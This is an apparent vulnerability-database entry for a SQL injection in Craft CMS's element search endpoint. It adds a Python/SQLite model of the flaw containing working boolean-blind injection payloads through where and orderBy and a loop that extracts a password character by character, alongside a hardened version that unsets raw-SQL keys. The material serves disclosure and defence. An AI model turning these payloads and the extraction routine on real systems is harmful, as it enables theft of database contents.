Craft CMS Improper Neutralization of Special Elements used in an SQL Command (SQL Injection) Vulnerability - CVE-2026-31858 - Vulnerability Database

Severity: High
Reference: CVE-2026-31858
Title: Craft CMS Improper Neutralization of Special Elements used in an SQL Command (SQL Injection) Vulnerability
Overview:

Craft is a content management system (CMS). The ElementSearchController::actionSearch() endpoint is missing the unset() protection that was added to ElementIndexesController in the fix for CVE-2026-25495. The same SQL injection (including criteria[orderBy], the vector from the original advisory) works against this controller because that fix was never applied to it. Any authenticated control panel user (no admin privileges required) can inject arbitrary SQL through criteria[where], criteria[orderBy] or other query properties and extract the full database contents by boolean-based blind injection. Users should update to the patched 5.9.9 release to mitigate the issue.
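The following is an added example, not Craft's code and not taken from the advisory. It models the pattern the overview describes in Python against an in-memory SQLite database: a search action that splices request-supplied where and orderBy criteria straight into SQL, the one-bit-per-request oracle an attacker builds on each of those properties to recover a secret column blind, and the hardened form that unsets the raw-SQL keys and restricts ordering to an allowlist. The table schema, the sample password, the key list RAW_SQL_KEYS and the allowlist ORDER_ALLOWLIST are all constructed for this example and are not Craft's.

```python
import sqlite3
import string

# Constructed sample schema (not Craft's): an 'elements' table the search
# endpoint queries, and a 'users' table holding the secret the attacker wants.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cr3t');
        CREATE TABLE elements (id INTEGER PRIMARY KEY, title TEXT, enabled INTEGER);
        INSERT INTO elements VALUES (1, 'Home', 1), (2, 'About', 1), (3, 'Draft', 0);
    """)
    return con

RAW_SQL_KEYS = ("where", "orderBy", "select", "join", "having")  # hypothetical list
ORDER_ALLOWLIST = {"id", "title"}                                 # hypothetical list

def search(con, criteria, hardened=False):
    """Model of an element-search action that applies request-supplied
    criteria[...] to a query. Vulnerable form: 'where' and 'orderBy' are
    spliced into the SQL verbatim. Hardened form: raw-SQL keys are unset
    before the query is built and ordering is limited to allowlisted columns."""
    criteria = dict(criteria)
    order_sql = ""
    if hardened:
        requested = criteria.get("orderBy")
        for key in RAW_SQL_KEYS:          # the unset() step the fix applies
            criteria.pop(key, None)
        if requested is not None:
            if requested not in ORDER_ALLOWLIST:
                raise ValueError(f"orderBy not allowed: {requested!r}")
            order_sql = f" ORDER BY {requested}"
    sql, params = "SELECT id, title FROM elements WHERE enabled = 1", []
    if "search" in criteria:              # the one key the action is meant to take
        sql += " AND title LIKE ?"
        params.append(f"%{criteria['search']}%")
    if "where" in criteria:
        sql += f" AND ({criteria['where']})"            # attacker-controlled SQL
    if "orderBy" in criteria:
        order_sql = f" ORDER BY {criteria['orderBy']}"  # attacker-controlled SQL
    return con.execute(sql + order_sql, params).fetchall()

def oracle_orderby(con, cond, hardened=False):
    """One bit per request via criteria[orderBy]: a CASE in ORDER BY makes the
    first row's id 1 when `cond` is true and 2 when it is false."""
    payload = f"CASE WHEN ({cond}) THEN id ELSE -id END"
    rows = search(con, {"orderBy": payload}, hardened)
    return rows[0][0] == 1

def oracle_where(con, cond, hardened=False):
    """Same bit via criteria[where]: rows come back only when `cond` holds."""
    return len(search(con, {"where": cond}, hardened)) > 0

def extract_password(con, oracle, hardened=False, max_len=32):
    """Boolean-based blind extraction of admin's password, one character per
    position. Returns None when the oracle cannot tell true from false (or the
    endpoint rejects the payload), which is what the hardened form produces."""
    try:
        usable = oracle(con, "1=1", hardened) and not oracle(con, "1=0", hardened)
    except ValueError:
        usable = False
    if not usable:
        return None
    recovered = ""
    alphabet = string.ascii_lowercase + string.digits
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = (f"(SELECT substr(password,{pos},1) FROM users "
                    f"WHERE username='admin')='{ch}'")
            if oracle(con, cond, hardened):
                recovered += ch
                break
        else:
            return recovered        # no character matched: end of the value
    return recovered

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, orderBy:", extract_password(db, oracle_orderby))
    print("vulnerable, where:  ", extract_password(db, oracle_where))
    print("hardened,   orderBy:", extract_password(db, oracle_orderby, hardened=True))
    print("hardened,   where:  ", extract_password(db, oracle_where, hardened=True))
```

The calibration step in extract_password (a known-true and a known-false condition before any real probe) is what a real attacker does to confirm the channel, and it is also why the hardened endpoint defeats the extraction: once where is unset, every request returns the same rows, and once orderBy is allowlisted, the CASE payload is rejected outright rather than evaluated.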